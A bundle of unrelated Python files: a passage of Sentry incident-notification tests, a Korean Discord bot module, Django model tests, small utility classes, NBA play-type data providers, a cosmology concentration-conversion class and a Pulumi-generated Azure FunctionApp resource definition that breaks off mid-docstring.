self.send_async.assert_not_called() # NOQA
self.send_async.reset_mock()
non_member_user = self.create_user(email='non_member@test.com')
subscribe_to_incident(activity.incident, non_member_user)
member_user = self.create_user(email='member@test.com')
self.create_member([self.team], user=member_user, organization=self.organization)
subscribe_to_incident(activity.incident, member_user)
send_subscriber_notifications(activity.id)
self.send_async.assert_called_once_with([member_user.email])
assert not IncidentSubscription.objects.filter(
incident=activity.incident,
user=non_member_user,
).exists()
assert IncidentSubscription.objects.filter(
incident=activity.incident,
user=member_user,
).exists()
def test_invalid_types(self):
for activity_type in (IncidentActivityType.CREATED, IncidentActivityType.DETECTED):
activity = create_incident_activity(self.incident, activity_type)
send_subscriber_notifications(activity.id)
self.send_async.assert_not_called() # NOQA
self.send_async.reset_mock()
class TestGenerateIncidentActivityEmail(BaseIncidentActivityTest, TestCase):
@freeze_time()
def test_simple(self):
activity = create_incident_activity(
self.incident,
IncidentActivityType.COMMENT,
user=self.user,
comment='hello',
)
incident = activity.incident
recipient = self.create_user()
message = generate_incident_activity_email(activity, recipient)
assert message.subject == 'Activity on Incident {} (#{})'.format(
incident.title,
incident.identifier,
)
assert message.type == 'incident.activity'
assert message.context == build_activity_context(activity, recipient)
class TestBuildActivityContext(BaseIncidentActivityTest, TestCase):
def run_test(
self,
activity,
expected_username,
expected_action,
expected_comment,
expected_recipient,
):
incident = activity.incident
context = build_activity_context(activity, expected_recipient)
assert context['user_name'] == expected_username
assert context['action'] == '%s on incident %s (#%s)' % (
expected_action,
activity.incident.title,
activity.incident.identifier,
)
assert context['link'] == absolute_uri(reverse(
'sentry-incident',
kwargs={
'organization_slug': incident.organization.slug,
'incident_id': incident.identifier,
},
)) + '?referrer=incident_activity_email'
assert context['comment'] == expected_comment
assert context['unsubscribe_link'] == generate_signed_link(
expected_recipient,
'sentry-account-email-unsubscribe-incident',
kwargs={'incident_id': incident.id},
)
def test_simple(self):
activity = create_incident_activity(
self.incident,
IncidentActivityType.COMMENT,
user=self.user,
comment='hello',
)
recepient = self.create_user()
self.run_test(
activity,
expected_username=activity.user.name,
expected_action='left a comment',
expected_comment=activity.comment,
expected_recipient=recepient,
)
activity.type = IncidentActivityType.STATUS_CHANGE
activity.value = six.text_type(IncidentStatus.CLOSED.value)
activity.previous_value = six.text_type(IncidentStatus.OPEN.value)
self.run_test(
activity,
expected_username=activity.user.name,
expected_action='changed status from %s to %s' % (
IncidentStatus.OPEN.name.lower(),
IncidentStatus.CLOSED.name.lower(),
),
expected_comment=activity.comment,
expected_recipient=recepient,
)
class CalculateIncidentSuspectsTest(TestCase):
def test_simple(self):
release = self.create_release(project=self.project, version='v12')
event = self.store_event(
data={
'timestamp': (timezone.now() - timedelta(minutes=1)).isoformat()[:19],
'fingerprint': ['group-1'],
'message': 'Kaboom!',
'platform': 'python',
'stacktrace': {'frames': [{'filename': 'sentry/models/release.py'}]},
'release': release.version,
},
project_id=self.project.id,
)
group = event.group
self.repo = Repository.objects.create(
organization_id=self.organization.id,
name=self.organization.id,
)
release.set_commits([{
'id': 'a' * 40,
'repository': self.repo.name,
'author_email': 'bob@example.com',
'author_name': 'Bob',
'message': 'i fixed a bug',
'patch_set': [{'path': 'src/sentry/models/release.py', 'type': 'M'}]
}])
commit = Commit.objects.filter(releasecommit__release__in=[release])
incident = self.create_incident(self.organization, groups=[group])
calculate_incident_suspects(incident.id)
assert IncidentSuspectCommit.objects.filter(
incident=incident,
commit=commit,
).exists()
|
import discord
from yrumee.modules import Module
class GradEraserModule(Module):
"""
<대학원 제거기>
[.대학원생] 대학원생 목록 표시
[.대학원갈래요] 대학원제거기 비활성화
[.대학원안가요] 대학원제거기 활성화
[.대학원에 @대상 살아요] 대학원생 목록에 해당 유저 등록 (ex. .대학원에 @이건우 살아요)
[.교수님 @대상 안보여요] 대학원생 목록에 해당 유저 삭제 (ex. .교수님 @이건우 안보여요)
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.is_active = False
self.slaves = self.storage_instance.get("slaves", [])
async def on_command(self, command: str, payload: str, message: discord.Message):
if command == "대학원생":
await message.channel.send(f"쿠아의 대학원생들 : {self.slaves}")
elif command == "대학원안가요":
if self.is_active is False:
self.is_active = True
await message.add_reaction("👌")
elif command == "대학원갈래요":
if self.is_active is True:
self.is_active = False
await message.add_reaction("👌")
elif command == "대학원에":
slave = message.mentions[0].id
self.slaves.append(slave)
await message.add_reaction("👌")
elif command == "교수님":
slave = message.mentions[0].id
if slave in self.slaves:
self.slaves.pop(self.slaves.index(slave))
await message.add_reaction("👌")
else:
await message.add_reaction("❓")
async def on_message(self, message: discord.Message) -> bool:
if (
"대학원" in message.content
and self.is_active
and message.author.id in self.slaves
):
await message.delete()
await message.channel.send("대학원은 여름이가 치워버렸다냥!")
return False
|
import os
import sys
import datetime
from retirement_api.models import (AgeChoice,
Question,
Step,
Page,
Tooltip,
Calibration)
import mock
from mock import patch, mock_open
from django.test import TestCase
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
sys.path.append(BASE_DIR)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
class ViewModels(TestCase):
testagechoice = AgeChoice(age=62, aside="Aside.")
testquestion = Question(
title="Test Question", slug='', question="Test question.")
teststep = Step(title="Test Step")
testpage = Page(title="Page title", intro="Intro")
testtip = Tooltip(title="Test Tooltip")
testcalibration = Calibration(created=datetime.datetime.now())
def test_calibration(self):
self.assertTrue('calibration' in self.testcalibration.__unicode__())
def test_get_subhed(self):
tc = self.testagechoice
self.assertTrue("You've chosen age 62" in tc.get_subhed())
def test_question_slug(self):
self.testquestion.save()
self.assertTrue(self.testquestion.slug != '')
def test_question_translist(self):
tlist = self.testquestion.translist()
self.assertTrue(type(tlist) == list)
for term in ['question',
'answer_yes_a',
'answer_no_b',
'answer_unsure_a_subhed']:
self.assertTrue(term in tlist)
def test_question_dump(self):
m = mock_open()
with patch("__builtin__.open", m, create=True):
mock_open.return_value = mock.MagicMock(spec=file)
self.testquestion.dump_translation_text(output=True)
self.assertTrue(m.call_count == 1)
def test_question_dump_no_output(self):
dump = self.testquestion.dump_translation_text()
self.assertEqual('Test question.', dump[0])
def test_agechoice_translist(self):
tlist = self.testagechoice.translist()
self.assertTrue(type(tlist) == list)
def test_step_translist(self):
tlist = self.teststep.translist()
self.assertTrue(type(tlist) == list)
def test_page_translist(self):
tlist = self.testpage.translist()
self.assertTrue(type(tlist) == list)
def test_tooltip_translist(self):
tlist = self.testtip.translist()
self.assertTrue(type(tlist) == list)
|
"""
Contains the definition of Font.
"""
from .style import Style
class Font(Style):
"""
Represents a font style.
"""
def __init__(self, family, style, size, postscript_name):
"""Initialize this Font."""
super().__init__('font')
self.family = family
self.style = style
self.size = size
self.postscript_name = postscript_name
def __repr__(self):
"""Return a constructor-style representation of this Font."""
return str.format(
'Font(family={}, style={}, size={}, postscript_name={})',
repr(self.family), repr(self.style), repr(self.size), repr(self.postscript_name))
|
# Linear form class.
class LinearForm(object):
"""Class of linear forms."""
pass
|
import goldsberry
class transition(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'Transition'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class isolation(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'Isolation'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class pick_and_roll_ball_handler(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'PRBallHandler'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class pick_and_roll_man(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'PRRollMan'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class postup(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'Postup'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class spotup(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'Spotup'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class handoff(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'Handoff'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class cut(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'Cut'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class offscreen(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'OffScreen'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class offrebound(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'OffRebound'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class misc(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'Misc'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
__all__ = ['transition', 'isolation', 'pick_and_roll_ball_handler',
'pick_and_roll_man', 'postup', 'spotup', 'handoff', 'cut',
'offscreen', 'offrebound', 'misc']
|
from __future__ import division
import numpy as np
import scipy.optimize as op
from scipy.interpolate import InterpolatedUnivariateSpline
from scipy.interpolate import RectBivariateSpline
from scipy import integrate
import cosmo
class ConcentrationConversion:
def __init__(self, MCrelation, cosmology=None):
self.MCrelation = MCrelation
# if isinstance(MCrelation, str):
if MCrelation=='Duffy08':
pass
elif MCrelation=='DK15':
# We compute the c-M relation for an array of z_arr and
# M_arr, and store the interpolation function in self
z_arr = np.linspace(0, 2, 21)
M_arr = np.logspace(13, 16, 301)
rho_m = cosmology['Omega_m'] * cosmo.RHOCRIT
Omh2 = cosmology['Omega_m']*cosmology['h']**2
Obh2 = cosmology['Omega_b']*cosmology['h']**2
fb = cosmology['Omega_b']/cosmology['Omega_m']
k_arr = np.logspace(-4, 2, 400)
# Eisenstein&Hu'99 transfer function (no wiggles)
# EQ 6
sound_horizon = 44.5 * np.log(9.83/Omh2) / (1 + 10*Obh2**.75)**.5
# EQ 31
alphaGamma = 1 - .328 * np.log(431 * Omh2) * fb + .38 * np.log(22.3*Omh2) * fb**2
# EQ 30
Gamma = cosmology['Omega_m']*cosmology['h'] * (alphaGamma + (1-alphaGamma)/(1 + (.43*k_arr*cosmology['h']*sound_horizon)**4))
# EQ 28
q = k_arr * (2.7255/2.7)**2 / Gamma
# EQ 29
C0 = 14.2 + 731 / (1 + 62.5*q)
L0 = np.log(2 * np.exp(1) + 1.8*q)
TF = L0 / (L0 + C0 * q**2)
# We only care about the derivative, not the normalization
PK_EHsmooth = k_arr**cosmology['ns']* TF**2
# Interpolation function for EQ 8, DK15
n_of_k = InterpolatedUnivariateSpline(np.log(k_arr), np.log(PK_EHsmooth))
# Normalized growth function
integrand = lambda z_int: (1+z_int) / cosmo.Ez(z_int, cosmology)**3
D_arr = np.array([cosmo.Ez(z, cosmology) * integrate.quad(integrand, z, 1e3)[0] for z in z_arr])
D_arr/= D_arr[0]
##### Compute sigma(M, z=0)
# Radius [M_arr]
R = (3 * M_arr / (4 * np.pi * rho_m))**(1/3)
R = np.append(R, 8)
# [M_arr, k_arr]
kR = k_arr[None,:] * R[:,None]
# Window functions [M_arr, k_arr]
window = 3 * (np.sin(kR)/kR**3 - np.cos(kR)/kR**2)
# Integrand [M_arr, k_arr]
integrand_sigma2 = PK_EHsmooth[None,:] * window[:,:]**2 * k_arr[None,:]**2
# sigma^2 [z_arr, M_arr]
sigma2 = .5/np.pi**2 * np.trapz(integrand_sigma2, k_arr, axis=-1)
sigma = sigma2[:-1]**.5 * cosmology['sigma8']/sigma2[-1]**.5
# EQ 12, DK15
k_R = .69 * 2 * np.pi / R[:-1]
n = n_of_k(np.log(k_R), nu=1)
# EQ 4, DK15 [z_arr, M_arr]
nu = 1.686 / sigma[None,:] / D_arr[:,None]
# EQ 10, DK15 [M_arr]
c_min = 6.58 + n*1.37
nu_min = 6.82 + n*1.42
# EQ 9, DK15 [z_arr, M_arr]
c = .5*c_min * ((nu_min/nu)**1.12 + (nu/nu_min)**1.69)
c[c>30.] = 30.
# Set up spline interpolation in z_arr and M_arr
self.concentration = RectBivariateSpline(z_arr, M_arr, c)
else:
raise ValueError('Unknown mass-concentration relation:', MCrelation)
# 200crit from Duffy et al 2008, input [M200c/h]
def calC200(self, m, z):
if self.MCrelation=='Duffy08':
m = np.atleast_1d(m)
m[np.where(m<1e9)] = 1e9
#return 6.71*(m/2.e12)**(-0.091)*(1.+z)**(-0.44) # relaxed samples
return 5.71*(m/2.e12)**(-0.084)*(1.+z)**(-0.47) # full sample
elif self.MCrelation=='DK15':
c = self.concentration(z, m)
# Reshape to match input...
if c.shape==(1,1):
c = c[0][0]
elif c.shape[0]==1:
c = c[0]
return c
else:
return float(self.MCrelation)
##### Actual input functions
# Input in [Msun/h]
def MDelta_to_M200(self,mc,overdensity,z):
ratio = overdensity/200.
Mmin = mc * ratio / 4.
Mmax = mc * ratio * 4.
return op.brentq(self.mdiff_findM200, Mmin, Mmax, args=(mc,overdensity,z), xtol=1.e-6)
# Input in [Msun/h]
def M200_to_MDelta(self, Minput, overdensity, z):
ratio = 200./overdensity
Mmin = Minput * ratio / 4.
Mmax = Minput * ratio * 4.
return op.brentq(self.mdiff_findMDelta, Mmin, Mmax, args=(Minput,overdensity,z), xtol=1.e-6)
##### Functions used for conversion
# calculate the coefficient for NFW aperture mass given c
def calcoef(self, c):
return np.log(1+c)-c/(1+c)
# root function for concentration
def diffc(self, c2, c200, ratio):
return self.calcoef(c200)/self.calcoef(c2) - ratio*(c200/c2)**3
def findc(self, c200, overdensity):
ratio = 200./overdensity
#if self.diffc(.1,c200,ratio)*self.diffc(100, c200, ratio)>0:
# print c200
return op.brentq(self.diffc, .1, 40., args=(c200,ratio), xtol=1.e-6)
# Root function for mass
def mdiff_findM200(self, m200, mc, overdensity, z):
con = self.calC200(m200,z)
con2 = self.findc(con,overdensity)
return m200/mc - self.calcoef(con)/self.calcoef(con2)
def mdiff_findMDelta(self,mguess,Minput,overdensity,z):
conin = self.calC200(Minput,z)
conguess = self.findc(conin,overdensity)
return Minput/mguess - self.calcoef(conin)/self.calcoef(conguess)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class FunctionApp(pulumi.CustomResource):
app_service_plan_id: pulumi.Output[str]
"""
The ID of the App Service Plan within which to create this Function App.
"""
app_settings: pulumi.Output[dict]
"""
A key-value pair of App Settings.
"""
auth_settings: pulumi.Output[dict]
"""
A `auth_settings` block as defined below.
* `activeDirectory` (`dict`)
* `allowedAudiences` (`list`)
* `client_id` (`str`)
* `client_secret` (`str`)
* `additionalLoginParams` (`dict`)
* `allowedExternalRedirectUrls` (`list`)
* `defaultProvider` (`str`)
* `enabled` (`bool`) - Is the Function App enabled?
* `facebook` (`dict`)
* `app_id` (`str`)
* `app_secret` (`str`)
* `oauthScopes` (`list`)
* `google` (`dict`)
* `client_id` (`str`)
* `client_secret` (`str`)
* `oauthScopes` (`list`)
* `issuer` (`str`)
* `microsoft` (`dict`)
* `client_id` (`str`)
* `client_secret` (`str`)
* `oauthScopes` (`list`)
* `runtimeVersion` (`str`)
* `tokenRefreshExtensionHours` (`float`)
* `tokenStoreEnabled` (`bool`)
* `twitter` (`dict`)
* `consumerKey` (`str`)
* `consumerSecret` (`str`)
* `unauthenticatedClientAction` (`str`)
"""
client_affinity_enabled: pulumi.Output[bool]
"""
Should the Function App send session affinity cookies, which route client requests in the same session to the same instance?
"""
connection_strings: pulumi.Output[list]
"""
An `connection_string` block as defined below.
* `name` (`str`) - The name of the Connection String.
* `type` (`str`) - The type of the Connection String. Possible values are `APIHub`, `Custom`, `DocDb`, `EventHub`, `MySQL`, `NotificationHub`, `PostgreSQL`, `RedisCache`, `ServiceBus`, `SQLAzure` and `SQLServer`.
* `value` (`str`) - The value for the Connection String.
"""
default_hostname: pulumi.Output[str]
"""
The default hostname associated with the Function App - such as `mysite.azurewebsites.net`
"""
enable_builtin_logging: pulumi.Output[bool]
"""
Should the built-in logging of this Function App be enabled? Defaults to `true`.
"""
enabled: pulumi.Output[bool]
"""
Is the Function App enabled?
"""
https_only: pulumi.Output[bool]
"""
Can the Function App only be accessed via HTTPS? Defaults to `false`.
"""
identity: pulumi.Output[dict]
"""
An `identity` block as defined below.
* `principalId` (`str`) - The Principal ID for the Service Principal associated with the Managed Service Identity of this App Service.
* `tenantId` (`str`) - The Tenant ID for the Service Principal associated with the Managed Service Identity of this App Service.
* `type` (`str`) - The type of the Connection String. Possible values are `APIHub`, `Custom`, `DocDb`, `EventHub`, `MySQL`, `NotificationHub`, `PostgreSQL`, `RedisCache`, `ServiceBus`, `SQLAzure` and `SQLServer`.
"""
kind: pulumi.Output[str]
"""
The Function App kind - such as `functionapp,linux,container`
"""
location: pulumi.Output[str]
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
name: pulumi.Output[str]
"""
The name of the Connection String.
"""
outbound_ip_addresses: pulumi.Output[str]
"""
A comma separated list of outbound IP addresses - such as `52.23.25.3,52.143.43.12`
"""
possible_outbound_ip_addresses: pulumi.Output[str]
"""
A comma separated list of outbound IP addresses - such as `52.23.25.3,52.143.43.12,52.143.43.17` - not all of which are necessarily in use. Superset of `outbound_ip_addresses`.
"""
resource_group_name: pulumi.Output[str]
"""
The name of the resource group in which to create the Function App.
"""
site_config: pulumi.Output[dict]
"""
A `site_config` object as defined below.
* `alwaysOn` (`bool`) - Should the Function App be loaded at all times? Defaults to `false`.
* `cors` (`dict`) - A `cors` block as defined below.
* `allowedOrigins` (`list`)
* `supportCredentials` (`bool`)
* `ftpsState` (`str`) - State of FTP / FTPS service for this function app. Possible values include: `AllAllowed`, `FtpsOnly` and `Disabled`.
* `http2Enabled` (`bool`) - Specifies whether or not the http2 protocol should be enabled. Defaults to `false`.
* `linuxFxVersion` (`str`) - Linux App Framework and version for the AppService, e.g. `DOCKER|(golang:latest)`.
* `minTlsVersion` (`str`) - The minimum supported TLS version for the function app. Possible values are `1.0`, `1.1`, and `1.2`. Defaults to `1.2` for new function apps.
* `use32BitWorkerProcess` (`bool`) - Should the Function App run in 32 bit mode, rather than 64 bit mode? Defaults to `true`.
* `virtualNetworkName` (`str`) - The name of the Virtual Network which this App Service should be attached to.
* `websocketsEnabled` (`bool`) - Should WebSockets be enabled?
"""
site_credential: pulumi.Output[dict]
"""
A `site_credential` block as defined below, which contains the site-level credentials used to publish to this App Service.
* `password` (`str`) - The password associated with the username, which can be used to publish to this App Service.
* `username` (`str`) - The username which can be used to publish to this App Service
"""
storage_connection_string: pulumi.Output[str]
"""
The connection string of the backend storage account which will be used by this Function App (such as the dashboard, logs).
"""
tags: pulumi.Output[dict]
"""
A mapping of tags to assign to the resource.
"""
version: pulumi.Output[str]
"""
The runtime version associated with the Function App. Defaults to `~1`.
"""
def __init__(__self__, resource_name, opts=None, app_service_plan_id=None, app_settings=None, auth_settings=None, client_affinity_enabled=None, connection_strings=None, enable_builtin_logging=None, enabled=None, https_only=None, identity=None, location=None, name=None, resource_group_name=None, site_config=None, storage_connection_string=None, tags=None, version=None, __props__=None, __name__=None, __opts__=None):
"""
Manages a Function App.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] app_service_plan_id: The ID of the App Service Plan within which to create this Function App.
:param pulumi.Input[dict] app_settings: A key-value pair of App Settings.
:param pulumi.Input[dict] auth_settings: A `auth_settings` block as defined below.
:param pulumi.Input[bool] client_affinity_enabled: Should the Function App send session affinity cookies, which route client requests in the same session to the same instance?
:param pulumi.Input[list] connection_strings: An `connection_string` block as defined below.
:param pulumi.Input[bool] enable_builtin_logging: Should the built-in logging of this Function App be enabled? Defaults to `true`.
:param pulumi.Input[bool] enabled: Is the Function App enabled?
:param pulumi.Input[bool] https_only: Can the Function App only be accessed via HTTPS? Defaults to `false`.
:param pulumi.Input[dict] identity: An `identity` block as defined below.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the Connection String.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Function App.
:param pulumi.Input[dict] site_config: A `site_config` object as defined below.
:param pulumi.Input[str] storage_connection_string: The connection string of the backend storage account which will be used by this Function App (such as the dashboard, logs).
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] version: The runtime version associated with the Function App. Defaults to `~1`.
The **auth_settings** object supports the following:
* `activeDirectory` (`pulumi.Input[dict]`)
* `allowedAudiences` (`pulumi.Input[list]`)
* `client_id` (`pulumi.Input[str]`)
* `client_secret` (`pulumi.Input[str]`)
* `additionalLoginParams` (`pulumi.Input[dict]`)
* `allowedExternalRedirectUrls` (`pulumi.Input[list]`)
* `defaultProvider` (`pulumi.Input[str]`)
* `enabled` (`pulumi.Input[bool]`) - Is the Function App enabled?
* `facebook` (`pulumi.Input[dict]`)
* `app_id` (`pulumi.Input[str]`)
* `app_secret` (`pulumi.Input[str]`)
* `oauthScopes` (`pulumi.Input[list]`)
* `google` (`pulumi.Input[dict]`)
* `client_id` (`pulumi.Input[str]`)
* `client_secret` (`pulumi.Input[str]`)
* `oauthScopes` (`pulumi.Input[list]`)
* `issuer` (`pulumi.Input[str]`)
* `microsoft` (`pulumi.Input[dict]`)
* `client_id` (`pulumi.Input[str]`)
* `client_secret` (`pulumi.Input[str]`)
* `oauthScopes` (`pulumi.Input[list]`)
* `runtimeVersion` (`pulumi.Input[str]`)
* `tokenRefreshExtensionHours` (`pulumi.Input[float]`)
* `tokenStoreEnabled` (`pulumi.Input[bool]`)
* `twitter` (`pulumi.Input[dict]`)
* `consumerKey` (`pulumi.Input[str]`)
* `consumerSecret` (`pulumi.Input[str]`)
* `unauthenticatedClientAction` (`pulumi.Input[str]`)
The **connection_strings** object supports the following:
* `name` (`pulumi.Input[str]`) - The name of the Connection String.
* `type` (`pulumi.Input[str]`) - The type of the Connection String. Possible values are `APIHub`, `Custom`, `DocDb`, `EventHub`, `MySQL`, `NotificationHub`, `PostgreSQL`, `RedisCache`, `ServiceBus`, `SQLAzure` and `SQLServer`.
* `value` (`pulumi.Input[str]`) - The value for the Connection String.
The **identity** object supports the following:
* `principalId` (`pulumi.Input[str]`) - The Principal ID for the Service Principal associated with the Managed Service Identity of this App Service.
* `tenantId` (`pulumi.Input[str]`) - The Tenant ID for the Service Principal associated with the Managed Service Identity of this App Service.
* `type` (`pulumi.Input[str]`) - The type of the Connection String. Possible values are `APIHub`, `Custom`, `DocDb`, `EventHub`, `MySQL`, `NotificationHub`, `PostgreSQL`, `RedisCache`, `ServiceBus`, `SQLAzure` and `SQLServer`.
The **site_config** object supports the following:
* `alwaysOn` (`pulumi.Input[bool]`) - Should the Function App be loaded at all times? Defaults to `false`.
* `cors` (`pulumi.Input[dict]`) - A `cors` block as defined below.
* `allowedOrigins` (`pulumi.Input[list]`)
* `supportCredentials` (`pulumi.Input[bool]`)
* `ftpsState` (`pulumi.Input[str]`) - State of FTP / FTPS service for this function app. Possible values include: `AllAllowed`, `FtpsOnly` and `Disabled`.
* `http2Enabled` (`pulumi.Input[bool]`) - Specifies whether or not the http2 protocol should be enabled. Defaults to `false`.
* `linuxFxVersion` (`pulumi.Input[str]`) - Linux App Framework and version for the AppService, e.g. `DOCKER|(golang:latest)`.
* `minTlsVersion` (`pulumi.Input[str]`) - The minimum supported TLS version for the function app. Possible values are `1.0`, `1.1`, and `1.2`. Defaults to `1.2` for new function apps.
* `use32BitWorkerProcess` (`pulumi.Input[bool]`) - Should the Function App run in 32 bit mode, rather than 64 bit mode? Defaults to `true`.
* `virtualNetworkName` (`pulumi.Input[str]`) - The name of the Virtual Network which this App Service should be attached to.
* `websocketsEnabled` (`pulumi.Input[bool]`) - Should WebSockets be enabled?
> This content is derived from https://github.com/terraform-providers/terraform-provider-azurerm/blob/master/website/docs/r/function_app.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if app_service_plan_id is None:
raise TypeError("Missing required property 'app_service_plan_id'")
__props__['app_service_plan_id'] = app_service_plan_id
__props__['app_settings'] = app_settings
__props__['auth_settings'] = auth_settings
__props__['client_affinity_enabled'] = client_affinity_enabled
__props__['connection_strings'] = connection_strings
__props__['enable_builtin_logging'] = enable_builtin_logging
__props__['enabled'] = enabled
__props__['https_only'] = https_only
__props__['identity'] = identity
__props__['location'] = location
__props__['name'] = name
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['site_config'] = site_config
if storage_connection_string is None:
raise TypeError("Missing required property 'storage_connection_string'")
__props__['storage_connection_string'] = storage_connection_string
__props__['tags'] = tags
__props__['version'] = version
__props__['default_hostname'] = None
__props__['kind'] = None
__props__['outbound_ip_addresses'] = None
__props__['possible_outbound_ip_addresses'] = None
__props__['site_credential'] = None
super(FunctionApp, __self__).__init__(
'azure:appservice/functionApp:FunctionApp',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, app_service_plan_id=None, app_settings=None, auth_settings=None, client_affinity_enabled=None, connection_strings=None, default_hostname=None, enable_builtin_logging=None, enabled=None, https_only=None, identity=None, kind=None, location=None, name=None, outbound_ip_addresses=None, possible_outbound_ip_addresses=None, resource_group_name=None, site_config=None, site_credential=None, storage_connection_string=None, tags=None, version=None):
"""
Get an existing FunctionApp resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] app_service_plan_id: The ID of the App Service Plan within which to create this Function App.
:param pulumi.Input[dict] app_settings: A key-value pair of App Settings.
:param pulumi.Input[dict] auth_settings: A `auth_settings` block as defined below.
:param pulumi.Input[bool] client_affinity_enabled: Should the Function App send session affinity cookies, which route client requests in the same session to the same instance?
:param pulumi.Input[list] connection_strings: An `connection_string` block as defined below.
:param pulumi.Input[str] default_hostname: The default hostname associated with the Function App - such as `mysite.azurewebsites.net`
:param pulumi.Input[bool] enable_builtin_logging: Should the built-in logging of this Function App be enabled? Defaults to `true`.
:param pulumi.Input[bool] enabled: Is the Function App enabled?
:param pulumi.Input[bool] https_only: Can the Function App only be accessed via HTTPS? Defaults to `false`.
:param pulumi.Input[dict] identity: An `identity` block as defined below.
:param pulumi.Input[str] kind: The Function App kind - such as `functionapp,linux,container`
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the Connection String.
:param pulumi.Input[str] outbound_ip_addresses: A comma separated list of outbound IP addresses - such as `52.23.25.3,52.143.43.12`
:param pulumi.Input[str] possible_outbound_ip_addresses: A comma separated list of outbound IP addresses - such as `52.23.25.3,52.143.43.12,52.143.43.17` - not all of which are necessarily in use. Superset of `outbound_ip_addresses`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Function App.
:param pulumi.Input[dict] site_config: A `site_config` object as defined below.
:param pulumi.Input[dict] site_credential: A `site_credential` block as defined below, which contains the site-level credentials used to publish to this App Service.
:param pulumi.Input[str] storage_connection_string: The connection string of the backend storage account which will be used by this Function App (such as the dashboard, logs).
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] version: The runtime version associated with the Function App. Defaults to `~1`.
The **auth_settings** object supports the following:
* `activeDirectory` (`pulumi.Input[dict]`)
* `allowedAudiences` (`pulumi.Input[list]`)
* `client_id` (`pulumi.Input[str]`)
* `client_secret` (`pulumi.Input[str]`)
* `additionalLoginParams` (`pulumi.Input[dict]`)
* `allowedExternalRedirectUrls` (`pulumi.Input[list]`)
* `defaultProvider` (`pulumi.Input[str]`)
* `enabled` (`pulumi.Input[bool]`) - Is the Function App enabled?
* `facebook` (`pulumi.Input[dict]`)
* `app_id` (`pulumi.Input[str]`)
* `app_secret` (`pulumi.Input[str]`)
* `oauthScopes` (`pulumi.Input[list]`)
* `google` (`pulumi.Input[dict]`)
* `client_id` (`pulumi.Input[str]`)
* `client_secret` (`pulumi.Input[str]`)
* `oauthScopes` (`pulumi.Input[list]`)
* `issuer` (`pulumi.Input[str]`)
* `microsoft` (`pulumi.Input[dict]`)
* `client_id` (`pulumi.Input[str]`)
